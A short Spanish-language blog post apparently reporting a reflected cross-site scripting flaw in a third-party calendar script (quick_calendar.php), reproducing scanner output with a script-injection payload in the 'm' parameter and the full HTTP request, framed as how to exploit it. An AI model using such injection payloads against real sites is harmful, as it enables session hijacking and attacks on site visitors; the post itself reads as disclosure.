Calendario


En estos dias estuvo verificando portales de la red con vulnerabilidades y me encontre con una que ya me habia sospechado existia. Se trata del calendario de un portal en la red que por sus caracteristicas javascript era para mi juicio altamente peligroso. Para mi sorpresa cuando verifique el portal por vulnerabilidades me encontre que la unica y mas importante estaba en el calendario. Peor aun como el calendario tiene infinitos años, meses y dias las probabilidades de un ataque son inminentes para el. He aqui como explotar una de las 608 vulnerabilidades de alto riesgo:

Affected items

/quick_calendar.php

Details

The GET variable m has been set to 1>"><ScRiPt%20%0a%0d>alert(427106868739)%3B</ScRiPt> .

Request

GET



/quick_calendar.php?m=1>"><ScRiPt%20%0a%0d>alert(427106868739)%3B</ScRiPt>&y=2009&ran=9487

HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host:
Cookie: PHPSESSID=faf1f8c60d868b041ef81d7a227169e0
Connection: Close
Pragma: no-cache



Como este calendario es obra de terceros es probale que no lo probaron o buscaron por vulnerabilides en el y, ahi esta todo el portal asegurado, pero la cosa mas pequeña lo hace completamente inseguro, para el administrador y para la gente que lo visita ya que como siempre puede ser explotado por cierta persona.

0 comentarios:

Publicar un comentario